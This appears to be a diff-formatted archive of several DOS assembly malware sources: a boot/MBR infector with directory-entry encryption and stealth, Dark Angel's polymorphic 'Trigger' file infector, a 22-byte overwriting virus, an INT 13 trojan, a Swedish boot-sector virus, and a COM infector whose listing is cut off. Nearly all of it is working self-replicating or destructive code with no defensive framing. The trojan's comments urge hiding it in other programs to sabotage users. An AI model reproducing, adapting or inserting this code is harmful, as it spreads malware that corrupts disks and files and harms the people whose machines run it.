mov si,13h*4
|
||||
mov di,9ah*4
|
||||
movsw ; set int 9ah on ROM int 13h
|
||||
movsw
|
||||
mov word ptr [si-4],offset int_13h_entry ; hook int 13h
|
||||
mov [si-2],ax
|
||||
cmp byte ptr [bx],0ebh ; we loading from floppy boot?
|
||||
jne load_from_mbr
|
||||
call copy_2_mbr ; yeah - infect mbr on 1st hd
|
||||
load_from_mbr: mov cl,11h ; read original mbr code
|
||||
read_sec: mov dx,80h
|
||||
mov ax,201h
|
||||
int 9ah
|
||||
retf ; exit
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
int_13h_entry: mov cs:store_fn,ah
|
||||
mov cs:store_sc,al
|
||||
cmp ax,0deadh ; our function?
|
||||
je exit_13h_retf
|
||||
int 9ah ; call old int 13h
|
||||
pushf
|
||||
push ax si di ds dx cx es
|
||||
pop ds
|
||||
jc exit_13h ; exit if error
|
||||
mov ax,0
|
||||
store_fn = byte ptr $-2
|
||||
cmp dl,80h ; non-1st hd?
|
||||
je hd_access
|
||||
cmp al,3 ; write?
|
||||
jne exit_13h
|
||||
cmp dx,cx ; floppy?
|
||||
ja no_boot_write
|
||||
dec cx ; boot?
|
||||
jnz no_boot_write
|
||||
mov word ptr [bx],3eebh ; yeah - infect floppy boot
|
||||
jmp copy_2_boot
|
||||
no_boot_write: mov ax,[bx]
|
||||
not ax
|
||||
mul ah
|
||||
sub ax,72bah ; 'MZ' or 'ZM' in buffer?
|
||||
jnz exit_13h
|
||||
int 1ah ; get timer tick
|
||||
mov cl,0 ; randomize
|
||||
offrand equ $-begin-1
|
||||
xchg dx,ax
|
||||
cwd
|
||||
idiv cx ; get random
|
||||
and dx,dx
|
||||
jnz exit_13h
|
||||
mov [bx+6],dx ; set number of relocation on zero
|
||||
mov word ptr [bx+8],4 ; length of header
|
||||
mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;)
|
||||
mov [bx+16h],dx
|
||||
rol byte ptr cs:offrand,1 ; change randomize
|
||||
copy_2_boot: lea di,[bx+40h]
|
||||
call crypt_self ; self encrypt and move 2 buffer
|
||||
pop cx dx
|
||||
call write_sec ; write sector on disk
|
||||
jmp exit_13h_pop
|
||||
hd_access: cmp al,2 ; read?
|
||||
jne no_stealth
|
||||
and dh,dh ; head is zero?
|
||||
jnz hd_read
|
||||
dec cx ; cyl/sec is 0/1?
|
||||
jnz hd_read
|
||||
mov cl,11h
|
||||
push cs
|
||||
call read_sec ; read original mbr
|
||||
exit_13h: pop cx dx
|
||||
exit_13h_pop: pop ds di si ax
|
||||
popf
|
||||
exit_13h_retf: retf 2 ; exit from int 13h
|
||||
no_stealth: cmp al,3 ; write?
|
||||
jne exit_13h
|
||||
hd_read: mov cs:cryp_or_decryp,0 ; set "js"
|
||||
org $-1
|
||||
js $
|
||||
org $-1
|
||||
call crypt_sec ; encrypt direntries in buffer
|
||||
cryp_switch label byte
|
||||
jnc decrypt_sec ; goto if direntries is not found
|
||||
pop cx ; restore cyl/sec
|
||||
push cx
|
||||
mov ah,3
|
||||
int 9ah ; re-write crypted direntries
|
||||
decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer
|
||||
push ax
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
crypt_sec: mov cx,0 ; number of sector
|
||||
store_sc = byte ptr $-2
|
||||
push cx
|
||||
mov si,bx
|
||||
scan_next_sec: push cx
|
||||
mov cl,10h ; number of direntries on one sector
|
||||
scan_next_elem: push cx si
|
||||
mov cl,0bh
|
||||
next_char_name: lodsb
|
||||
cmp al,' ' ; check if filename
|
||||
jb get_next_elem
|
||||
loop next_char_name
|
||||
lodsb
|
||||
test al,11001000b ; check if attribute
|
||||
jnz get_next_elem
|
||||
mov cl,9
|
||||
next_char_res: lodsb
|
||||
and al,al ; check if normal (not long!) filename
|
||||
jnz get_next_elem
|
||||
loop next_char_res
|
||||
test [si],dl ; already en/decrypted?
|
||||
cryp_or_decryp label byte
|
||||
js get_next_elem
|
||||
xor [si],dl ; en/decrypt direntry
|
||||
mov ax,0 ; mask of crypt
|
||||
rom_mask equ $-begin-2
|
||||
sub ax,[si+1]
|
||||
xor [si+5],ax
|
||||
mov ah,1 ; set bit
|
||||
get_next_elem: pop si cx
|
||||
add si,20h ; get next direntry
|
||||
loop scan_next_elem
|
||||
pop cx ; get next sector
|
||||
loop scan_next_sec
|
||||
inc cs:cryp_or_decryp ; change condition
|
||||
sahf ; store bit on cf
|
||||
pop ax
|
||||
retn
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
crypt_self: push cs
|
||||
pop ds
|
||||
xor si,si
|
||||
in al,40h ; get random mask
|
||||
mov [si+xor_mask],al
|
||||
mov cl,decryp_begin
|
||||
rep movsb ; move unencrypted part
|
||||
mov ah,-1
|
||||
mov cx,decryp_len
|
||||
xor_encryp: sub ah,al
|
||||
movsb
|
||||
xor es:[di-1],ah
|
||||
loop xor_encryp ; move and encrypt selfbody
|
||||
retn
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
copy_2_mbr: mov cx,1
|
||||
push cs
|
||||
call read_sec ; read mbr on 1st hd
|
||||
cmp byte ptr es:[bx],0 ; already infected?
|
||||
org $-1
|
||||
mov cx,0
|
||||
org $-2
|
||||
je already_prs
|
||||
mov cl,11h
|
||||
call write_sec ; store original mbr in 0/0/17
|
||||
mov di,bx
|
||||
call crypt_self ; move and encrypt selfbody
|
||||
inc cx ; cx=1
|
||||
write_sec: mov ax,301h
|
||||
int 9ah ; infect mbr
|
||||
already_prs: retn
|
||||
|
||||
decryp_len equ $-decryp_code
|
||||
len_body equ $-begin
|
||||
buffer label byte
|
||||
|
||||
end begin
|
|
@ -0,0 +1,500 @@
|
|||
.model tiny
|
||||
.code
|
||||
.radix 16
|
||||
org 0
|
||||
|
||||
viruslength = (heap - entry)
|
||||
virussizeK = (endvirus - entry + 3ff) / 400
|
||||
virussizepara = (virussizeK)*40
|
||||
|
||||
EXE_ID = 'PS'
|
||||
|
||||
entry:
|
||||
call past
|
||||
next:
|
||||
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
|
||||
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
|
||||
db 0Dh,0A,0
|
||||
|
||||
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
|
||||
|
||||
past: cld
|
||||
pop bp
|
||||
|
||||
mov ax,0cf0
|
||||
mov bx,'DA'
|
||||
int 21
|
||||
cmp bx,'GH'
|
||||
jnz no_trigger
|
||||
trigger:
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
xor ax,ax
|
||||
checkagain:
|
||||
lea si,[bp+checkstub-next]
|
||||
mov es,ax
|
||||
xor di,di
|
||||
mov cx,8
|
||||
rep cmpsw
|
||||
jz trigger_it
|
||||
inc ax
|
||||
cmp ax,0a000
|
||||
jb checkagain
|
||||
jmp exit_trigger
|
||||
trigger_it:
|
||||
mov [bp+patch-next],ax
|
||||
mov ds,ax
|
||||
mov byte ptr ds:73,0cbh
|
||||
push bp
|
||||
mov bp,-80
|
||||
jmp short $+2
|
||||
db 09a ; call far ptr
|
||||
dw 1
|
||||
patch dw ?
|
||||
pop bp
|
||||
mov byte ptr ds:73,1f
|
||||
exit_trigger:
|
||||
pop es
|
||||
pop ds
|
||||
jmp short restore
|
||||
|
||||
no_trigger:
|
||||
mov ax,4b90
|
||||
int 21
|
||||
cmp ax,bx
|
||||
jz restore
|
||||
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,ds
|
||||
dec ax
|
||||
mov ds,ax
|
||||
sub word ptr ds:3,virussizepara
|
||||
sub word ptr ds:12,virussizepara
|
||||
mov es,ds:12
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
xor di,di
|
||||
lea si,[bp+offset entry-offset next]
|
||||
mov cx,(viruslength + 1)/2
|
||||
rep movsw
|
||||
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
sub word ptr ds:413,virussizeK
|
||||
|
||||
mov di,offset oldint21
|
||||
mov si,21*4
|
||||
movsw
|
||||
movsw
|
||||
|
||||
cli
|
||||
|
||||
pushf
|
||||
pushf
|
||||
pop ax
|
||||
or ah,1
|
||||
push ax
|
||||
|
||||
mov ds:1*4+2,es
|
||||
mov word ptr ds:1*4,offset int1_1
|
||||
|
||||
popf
|
||||
|
||||
mov ah,30
|
||||
pushf
|
||||
call dword ptr ds:21*4
|
||||
|
||||
popf
|
||||
|
||||
lds si,dword ptr es:oldint21
|
||||
mov di,si
|
||||
lodsw
|
||||
mov word ptr es:int21patch1,ax
|
||||
lodsw
|
||||
mov word ptr es:int21patch2,ax
|
||||
lodsb
|
||||
mov byte ptr es:int21patch3,al
|
||||
|
||||
push ds ; es:di->int 21 handler
|
||||
push es
|
||||
pop ds ; ds->high segment
|
||||
pop es
|
||||
|
||||
mov al,0ea
|
||||
stosb
|
||||
mov ax,offset int21
|
||||
stosw
|
||||
mov ax,ds
|
||||
stosw
|
||||
sti
|
||||
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
restore:
|
||||
cmp sp,-2
|
||||
jnz restoreEXE
|
||||
restoreCOM:
|
||||
lea si,[bp+readbuffer-next]
|
||||
mov di,100
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
ret
|
||||
restoreEXE:
|
||||
mov ax,ds
|
||||
add ax,10
|
||||
add cs:[bp+readbuffer+16-next], ax
|
||||
add ax,cs:[bp+readbuffer+0e-next]
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp+readbuffer+10-next]
|
||||
jmp dword ptr cs:[bp+readbuffer+14-next]
|
||||
|
||||
readbuffer dw 20cdh
|
||||
dw 0bh dup (?)
|
||||
|
||||
int1_1:
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
|
||||
mov ax, [bp+4] ; get segment
|
||||
cmp ax, cs:oldint21+2
|
||||
jae exitint1
|
||||
mov cs:oldint21+2,ax
|
||||
mov ax, [bp+2]
|
||||
mov cs:oldint21,ax
|
||||
exitint1:
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
int1_2:
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
|
||||
mov ax,cs
|
||||
cmp ax,[bp+4]
|
||||
jz exitint1
|
||||
|
||||
mov ax,[bp+4]
|
||||
cmp ax,cs:oldint21+2
|
||||
jnz int1_2_restore
|
||||
|
||||
mov ax,[bp+2]
|
||||
cmp ax,cs:oldint21
|
||||
jb int1_2_restore
|
||||
sub ax,5
|
||||
cmp ax,cs:oldint21
|
||||
jbe exitint1
|
||||
int1_2_restore:
|
||||
push es
|
||||
push di
|
||||
cld
|
||||
les di,dword ptr cs:oldint21
|
||||
mov al,0ea
|
||||
stosb
|
||||
mov ax,offset int21
|
||||
stosw
|
||||
mov ax,cs
|
||||
stosw
|
||||
pop di
|
||||
pop es
|
||||
|
||||
and [bp+6],0feff
|
||||
jmp exitint1
|
||||
|
||||
install:
|
||||
mov bx,ax
|
||||
iret
|
||||
int21:
|
||||
cmp ax,4b90
|
||||
jz install
|
||||
|
||||
push ds
|
||||
push di
|
||||
lds di,dword ptr cs:oldint21
|
||||
mov word ptr ds:[di],1234
|
||||
int21patch1 = $ - 2
|
||||
mov word ptr ds:[di+2],1234
|
||||
int21patch2 = $ - 2
|
||||
mov byte ptr ds:[di+4],12
|
||||
int21patch3 = $ - 1
|
||||
pop di
|
||||
pop ds
|
||||
|
||||
cld
|
||||
|
||||
cmp ax,4b00
|
||||
jz infect
|
||||
|
||||
exitint21:
|
||||
push ds
|
||||
push ax
|
||||
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
cli
|
||||
mov word ptr ds:1*4,offset int1_2
|
||||
mov ds:1*4+2,cs
|
||||
sti
|
||||
|
||||
pushf
|
||||
pop ax
|
||||
or ah,1
|
||||
push ax
|
||||
popf
|
||||
pop ax
|
||||
pop ds
|
||||
db 0ea
|
||||
oldint21 dw 0, 0
|
||||
|
||||
callint21:
|
||||
pushf
|
||||
call dword ptr cs:oldint21
|
||||
ret
|
||||
|
||||
already_infected:
|
||||
pop dx
|
||||
pop cx
|
||||
mov ax,5701
|
||||
call callint21
|
||||
|
||||
mov ah,3e
|
||||
call callint21
|
||||
exitnoclose:
|
||||
mov ax,4301
|
||||
pop dx
|
||||
pop ds
|
||||
pop cx
|
||||
call callint21
|
||||
|
||||
exitinfect:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop bp
|
||||
pop bx
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
jmp exitint21
|
||||
|
||||
infect:
|
||||
push ax
|
||||
push cx
|
||||
push dx
|
||||
push bx
|
||||
push bp
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,4300
|
||||
call callint21
|
||||
push cx
|
||||
push ds
|
||||
push dx
|
||||
|
||||
mov ax,4301
|
||||
xor cx,cx
|
||||
call callint21
|
||||
|
||||
mov ax,3d02
|
||||
call callint21
|
||||
jc exitnoclose
|
||||
xchg ax,bx
|
||||
|
||||
mov ax,5700
|
||||
int 21
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov ah,3f
|
||||
mov cx,18
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov dx,offset readbuffer
|
||||
mov si,dx
|
||||
call callint21
|
||||
jc already_infected
|
||||
|
||||
mov di,offset writebuffer
|
||||
mov cx,18/2
|
||||
|
||||
push si
|
||||
push di
|
||||
|
||||
rep movsw
|
||||
|
||||
pop di
|
||||
pop si
|
||||
|
||||
mov ax,4202
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
cmp word ptr [di],'ZM'
|
||||
jnz infectCOM
|
||||
|
||||
infectEXE:
|
||||
cmp readbuffer+10,EXE_ID
|
||||
go_already_infected:
|
||||
jz already_infected
|
||||
|
||||
mov ds:writebuffer+4,ax
|
||||
mov ds:writebuffer+2,dx
|
||||
|
||||
mov cx,10
|
||||
div cx
|
||||
|
||||
sub ax,ds:writebuffer+8
|
||||
|
||||
mov ds:writebuffer+14,dx
|
||||
mov ds:writebuffer+16,ax
|
||||
|
||||
xchg cx,dx
|
||||
|
||||
mov ds:writebuffer+0e,ax
|
||||
mov ds:writebuffer+10,EXE_ID
|
||||
|
||||
mov al,10b
|
||||
jmp finishinfect
|
||||
|
||||
infectCOM: ; si = readbuffer, di = writebuffer
|
||||
push ax
|
||||
|
||||
mov cx,4
|
||||
xor dx,dx
|
||||
check_infection_loop:
|
||||
lodsb
|
||||
add dl,al
|
||||
loop check_infection_loop
|
||||
|
||||
pop ax
|
||||
|
||||
or dl,dl
|
||||
jz go_already_infected
|
||||
|
||||
mov dx,18
|
||||
cmp ax,dx
|
||||
jnb no_fixup_com
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
int 21
|
||||
no_fixup_com:
|
||||
mov cx,ax
|
||||
inc ch ; add cx,100
|
||||
sub ax,3
|
||||
push ax
|
||||
mov al,0e9
|
||||
stosb
|
||||
pop ax
|
||||
stosw
|
||||
add al,ah
|
||||
add al,0e9
|
||||
neg al
|
||||
stosb
|
||||
|
||||
mov al,11b
|
||||
finishinfect:
|
||||
cbw
|
||||
; ax = bitmask
|
||||
; bx = start decrypt in carrier file
|
||||
; cx = encrypt length
|
||||
; dx = start encrypt in virus
|
||||
; si = buffer to put decryption routine
|
||||
; di = buffer to put encryption routine
|
||||
push bx
|
||||
|
||||
xchg cx,bx
|
||||
|
||||
xor si,si
|
||||
mov di,offset copyvirus
|
||||
mov cx,(heap-entry+1)/2
|
||||
rep movsw
|
||||
|
||||
push ax
|
||||
call rnd_init_seed
|
||||
pop ax
|
||||
|
||||
mov dx,offset copyvirus
|
||||
mov cx,viruslength
|
||||
mov si,offset _decryptbuffer
|
||||
mov di,offset _encryptbuffer
|
||||
call dame
|
||||
|
||||
push cx
|
||||
|
||||
cmp ds:writebuffer,'ZM'
|
||||
jnz no_fix_header
|
||||
|
||||
mov dx,ds:writebuffer+2
|
||||
mov ax,ds:writebuffer+4
|
||||
add cx,viruslength
|
||||
add ax,cx
|
||||
adc dx,0
|
||||
mov cx,200
|
||||
div cx
|
||||
or dx,dx
|
||||
jz nohiccup
|
||||
inc ax
|
||||
nohiccup:
|
||||
mov ds:writebuffer+4,ax
|
||||
mov ds:writebuffer+2,dx
|
||||
no_fix_header:
|
||||
call di
|
||||
pop cx
|
||||
|
||||
pop bx
|
||||
|
||||
mov ah,40
|
||||
mov dx,offset _decryptbuffer
|
||||
call callint21
|
||||
|
||||
mov ah,40
|
||||
mov cx,viruslength
|
||||
mov dx,offset copyvirus
|
||||
call callint21
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
mov ah,40
|
||||
mov cx,18
|
||||
mov dx,offset writebuffer
|
||||
call callint21
|
||||
jmp already_infected
|
||||
|
||||
vars = 0
|
||||
include dame.asm
|
||||
|
||||
heap:
|
||||
vars = 1
|
||||
include dame.asm
|
||||
|
||||
writebuffer dw 0c dup (?)
|
||||
_encryptbuffer: db 80 dup (?)
|
||||
_decryptbuffer: db 180 dup (?)
|
||||
copyvirus db viruslength dup (?)
|
||||
db 20 dup (?)
|
||||
endvirus:
|
||||
|
||||
end entry
|
||||
|
|
@ -0,0 +1,17 @@
|
|||
;22 Byte Trivial Virus
|
||||
;Use WASM to assemble
|
||||
|
||||
org 100h
|
||||
|
||||
db '*.*',0
|
||||
|
||||
mov ah,4eh
|
||||
Again
|
||||
mov dx,si
|
||||
int 21h
|
||||
mov ah,3ch
|
||||
mov dx,9eh
|
||||
int 21h
|
||||
xchg bx,ax
|
||||
mov ah,40h
|
||||
jmps Again
|
|
@ -0,0 +1,69 @@
|
|||
;*****************************************************************************
|
||||
; The High Evolutionary's INT 13 Trojan
|
||||
;*****************************************************************************
|
||||
;
|
||||
; Development Notes:
|
||||
; (Dec.1O.9O)
|
||||
;
|
||||
; Well, I was screwing around with TSR's the other day and I got the idea,
|
||||
; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR
|
||||
; program answers my query.
|
||||
;
|
||||
; It's really a big mess. You can't access any file on the directory, you can't
|
||||
; DIR anything, can't TYPE anything, I think the only thing you can do is
|
||||
; DEL which is handled by INT 21.
|
||||
;
|
||||
; Well, in any event, put this routine in any nifty source code you see and
|
||||
; then compile it... It will confuse the fuck out of any 100% "Lame" user.
|
||||
;
|
||||
; Have fun...
|
||||
;
|
||||
; -= The High Evolutionary =-
|
||||
;
|
||||
;*****************************************************************************
|
||||
; Copyright (C) 199O by The RABID Nat'nl Development Corp.
|
||||
;*****************************************************************************
|
||||
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: jmp init_vectors
|
||||
|
||||
mesg db 'INT 13 Trojan by The High Evolutionary'
|
||||
crud db '(C) 199O by RABID Nat''nl Development Corp.'
|
||||
crap dd ?
|
||||
|
||||
program proc far
|
||||
|
||||
assume cs:code,ds:nothing
|
||||
|
||||
mov ax,4c00h ; Terminate Program with exit code 00
|
||||
int 21h ; Call DOS
|
||||
|
||||
program endp
|
||||
|
||||
;
|
||||
; The TSR initialization shit happens here...
|
||||
;
|
||||
|
||||
init_vectors proc near
|
||||
|
||||
assume cs:code,ds:code
|
||||
|
||||
mov ah,35h ; ask for int vector
|
||||
mov al,13h ; intercept INT 13
|
||||
int 21h ; Call DOS
|
||||
mov word ptr crap,bx
|
||||
mov word ptr crap[2],es
|
||||
mov ah,25h ; set int value
|
||||
mov al,13h ; set for INT 13
|
||||
mov dx,offset program ; Tell the TSR what to do when accessed
|
||||
int 21h ; Call DOS
|
||||
mov dx,offset init_vectors ; Load in this segment into DX
|
||||
int 27h ; Make the sucker in DX TSR...
|
||||
|
||||
init_vectors endp
|
||||
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,260 @@
|
|||
; Senast „ndrad 891213.
|
||||
;
|
||||
; L„gger gamla bootsectorn p† sida 1, sp†r 0, sector 3.
|
||||
; sida 0, sp†r 0, sector 7 p† HD.
|
||||
|
||||
|
||||
Code Segment
|
||||
Assume cs:Code
|
||||
Org 0000h
|
||||
|
||||
Main Proc Far
|
||||
db 0EAh,05h,00h,0C0h,07h
|
||||
|
||||
jmp Near Ptr Init ; Hoppa f”rbi variabler och nya int13h
|
||||
|
||||
|
||||
; Variabler
|
||||
|
||||
Old13h dd 0 ; Gamla vectorn till diskfunktionerna.
|
||||
|
||||
TmpVec dd 0 ; Tempor„r vec. vid „ndring av int 13.
|
||||
|
||||
BootPek dw 0003h,0100h
|
||||
|
||||
; Slut p† variabler
|
||||
|
||||
|
||||
|
||||
Int13h Proc Near
|
||||
push ds
|
||||
push ax
|
||||
push bx
|
||||
|
||||
cmp dl,00h ; Drive A
|
||||
jne Exit
|
||||
|
||||
cmp ah,02h
|
||||
jb Exit
|
||||
cmp ah,04h
|
||||
ja Exit ; Kolla s† att func. 2-4
|
||||
|
||||
sub ax,ax
|
||||
mov ds,ax
|
||||
mov bx,043Fh ; Motor status byte.
|
||||
test Byte Ptr [bx],01h ; Testa om motorn i A: „r p†..
|
||||
jnz Exit ; Nej,hoppa till gamla int 13h
|
||||
|
||||
call Smitta
|
||||
|
||||
Exit: pop bx
|
||||
pop ax
|
||||
pop ds
|
||||
jmp [Old13h]
|
||||
|
||||
|
||||
Smitta Proc Near
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push es
|
||||
|
||||
push cs
|
||||
pop es
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov si,0004h ; Max antal f”rs”k.
|
||||
|
||||
Retry: mov ax,0201h ; L„s en sector
|
||||
mov bx,0200h ; L„s hit.
|
||||
mov cx,0001h ; Sp†r 0 Sector 1
|
||||
sub dx,dx ; Sida 0 Drive 0
|
||||
pushf
|
||||
call [Old13h] ; L„s in booten.
|
||||
|
||||
jnc OK
|
||||
|
||||
dec si
|
||||
jz Slut ; Hoppa ur om fel.
|
||||
jmp Retry ; F”rs”k max 4 g†nger.
|
||||
|
||||
|
||||
OK: mov si,0200h
|
||||
sub di,di
|
||||
cld
|
||||
lodsw
|
||||
cmp ax,[di]
|
||||
jne L2
|
||||
lodsw
|
||||
cmp ax,[di+2]
|
||||
jne L2
|
||||
jmp Slut
|
||||
|
||||
L2: mov ax,0301h ; Skriv en sector.
|
||||
mov bx,0200h
|
||||
mov cx,0003h ; Sp†r 0 Sector 3
|
||||
mov dx,0100h ; Sida 1 Drive 0
|
||||
pushf
|
||||
call [Old13h] ; Flytta boot sectorn.
|
||||
|
||||
mov ax,0301h
|
||||
sub bx,bx
|
||||
mov cx,0001h
|
||||
sub dx,dx
|
||||
pushf
|
||||
call [Old13h] ; Skriv ner viruset till booten.
|
||||
|
||||
Slut: pop es
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
ret
|
||||
Smitta Endp
|
||||
Int13h Endp
|
||||
|
||||
Init: sub ax,ax
|
||||
mov ds,ax ; Nollar ds f”r att „ndra vect.
|
||||
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,7C00h
|
||||
sti ; S„tter upp en ny stack.
|
||||
|
||||
push cs
|
||||
pop es
|
||||
mov di,Offset Old13h
|
||||
mov si,004Ch
|
||||
mov cx,0004h
|
||||
cld
|
||||
rep movsb ; Flytta int 13h vectorn.
|
||||
|
||||
mov bx,0413h
|
||||
mov ax,[bx] ; Minnesstorleken till ax.
|
||||
dec ax
|
||||
dec ax
|
||||
mov [bx],ax ; Reservera plats f”r viruset.
|
||||
|
||||
mov cl,06h
|
||||
shl ax,cl
|
||||
mov es,ax ; Omvandla till segment addres.
|
||||
|
||||
mov Word Ptr TmpVec,Offset Int13h
|
||||
mov Word Ptr TmpVec+2,es
|
||||
push es
|
||||
sub ax,ax
|
||||
mov es,ax
|
||||
push cs
|
||||
pop ds
|
||||
mov si,Offset TmpVec
|
||||
mov di,004Ch
|
||||
mov cx,0004h
|
||||
rep movsb
|
||||
pop es
|
||||
|
||||
sub si,si
|
||||
mov di,si
|
||||
mov cx,0200h ; Hela viruset + lite till.
|
||||
rep movsb
|
||||
|
||||
mov ax,Offset Here
|
||||
push es
|
||||
push ax
|
||||
ret ; Hoppa till viruset.
|
||||
|
||||
Here: sub ax,ax
|
||||
int 13h ; <20>terst„ll driven
|
||||
|
||||
sub ax,ax
|
||||
mov es,ax
|
||||
mov ax,0201h ; L„s en sector funk.
|
||||
mov bx,7C00h ; Hit laddas booten normalt.
|
||||
mov cx,BootPek
|
||||
mov dx,BootPek+2
|
||||
int 13h
|
||||
|
||||
push cs
|
||||
pop es
|
||||
mov ax,0201h
|
||||
mov bx,0200h
|
||||
mov cx,0001h
|
||||
mov dx,0080h
|
||||
int 13h ; L„s in partions tabellen.
|
||||
jc Over
|
||||
push cs
|
||||
pop ds
|
||||
mov si,0200h
|
||||
sub di,di
|
||||
lodsw
|
||||
cmp ax,[di] ; Kolla om den „r smittad.
|
||||
jne HdInf
|
||||
lodsw
|
||||
cmp ax,[di+2]
|
||||
jne HdInf
|
||||
|
||||
Over: mov BootPek,0003h
|
||||
mov BootPek+2,0100h
|
||||
sub bx,bx
|
||||
push bx
|
||||
mov bx,7C00h
|
||||
push bx
|
||||
ret ; K”r den gamla booten.
|
||||
|
||||
HdInf: mov BootPek,0007h
|
||||
mov BootPek+2,0080h
|
||||
|
||||
mov ax,0301h
|
||||
mov bx,0200h
|
||||
mov cx,0007h
|
||||
mov dx,0080h
|
||||
int 13h ; Flytta orgin. part.tabellen.
|
||||
jc Over
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov si,03BEh
|
||||
mov di,01BEh
|
||||
mov cx,0042h
|
||||
cld
|
||||
rep movsb ; Kopiera part. data till viruset.
|
||||
|
||||
mov ax,0301h
|
||||
sub bx,bx
|
||||
mov cx,0001h
|
||||
mov dx,0080h
|
||||
int 13h ; Skriv viruset till part. tabellen.
|
||||
|
||||
|
||||
sub ax,ax
|
||||
mov es,ax ; Kolla om msg:et ska skrivas ut.
|
||||
test Byte Ptr es:[046Ch],07h
|
||||
jnz HdInf1
|
||||
|
||||
mov si,Offset Txt ; Detta utf”rs bara om man bootar fr†n
|
||||
cld ; diskett.
|
||||
Foo1: lodsb
|
||||
cmp al,00h
|
||||
je HdInf1
|
||||
mov ah,0Eh
|
||||
sub bx,bx
|
||||
int 10h
|
||||
jmp Foo1
|
||||
|
||||
HdInf1: jmp Over
|
||||
|
||||
|
||||
Slutet Label Byte ; Anv„nds f”r att veta var slutet „r.
|
||||
|
||||
|
||||
Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h
|
||||
|
||||
|
||||
Main Endp
|
||||
Code Ends
|
||||
End
|
||||
|
||||
|
|
@ -0,0 +1,166 @@
|
|||
; Silence of The Lambs v1.0
|
||||
; (c) The Chronomancer of Demoralized Youth 1992
|
||||
;
|
||||
; First version : Thursday 27th of Febuary - 01:50 CET.
|
||||
;
|
||||
|
||||
org 100h
|
||||
jmp short dummy1
|
||||
db 'DY'
|
||||
dummy1:
|
||||
mov cx,(100h-80h)/2 ;save command line on stack
|
||||
mov si,80h
|
||||
save_parm:
|
||||
push [si]
|
||||
inc si
|
||||
inc si
|
||||
loop save_parm
|
||||
|
||||
mov ah,4Eh
|
||||
xor cx,cx
|
||||
mov dx,offset file
|
||||
int 21h
|
||||
jc nomore
|
||||
again:
|
||||
cmp byte [9Eh],0FAh
|
||||
jae more
|
||||
call infect
|
||||
more:
|
||||
mov ah,4Fh
|
||||
int 21h
|
||||
jnc again
|
||||
nomore:
|
||||
mov cx,(100h-80h)/2
|
||||
mov si,0FEh
|
||||
rest_parm:
|
||||
pop [si]
|
||||
dec si
|
||||
dec si
|
||||
loop rest_parm
|
||||
|
||||
mov bx,0000h
|
||||
eof equ $-2
|
||||
jmp bx
|
||||
|
||||
file db '*.COM',0
|
||||
|
||||
infect:
|
||||
mov bx,cs
|
||||
mov si,cs
|
||||
dec si
|
||||
mov ds,si
|
||||
cmp byte[0],'Z'
|
||||
je ok_mark
|
||||
jmp back2
|
||||
ok_mark:
|
||||
sub word [0003h],pgfsize
|
||||
jnc ok_mark2
|
||||
jmp back
|
||||
ok_mark2:
|
||||
mov ax,[0012h]
|
||||
sub ax,pgfsize
|
||||
push ax
|
||||
|
||||
mov ds,bx
|
||||
mov ax,4301h
|
||||
xor cx,cx
|
||||
mov dx,80h+1Eh
|
||||
int 21h
|
||||
|
||||
mov ax,3D02h
|
||||
int 21h
|
||||
xchg bx,ax
|
||||
|
||||
pop ds
|
||||
push ds
|
||||
mov cx,total
|
||||
xor dx,dx
|
||||
mov ah,3Fh
|
||||
int 21h
|
||||
|
||||
cmp byte [0],'M' ;exe ?
|
||||
je close
|
||||
cmp byte [0],'Z' ;exe ?
|
||||
je close
|
||||
cmp word [2],'YD' ;allready infected?
|
||||
je close
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
push cx
|
||||
push dx
|
||||
mov ax,4202h
|
||||
int 21h
|
||||
|
||||
add ax,total+100h
|
||||
mov cs:word [00FEh],ax
|
||||
|
||||
mov ah,40h
|
||||
mov cx,total
|
||||
xor dx,dx
|
||||
int 21h
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ah,40h
|
||||
mov cx,applen
|
||||
mov dx,offset append
|
||||
int 21h
|
||||
|
||||
mov ax,4200h
|
||||
pop dx
|
||||
pop cx
|
||||
int 21h
|
||||
|
||||
push [eof]
|
||||
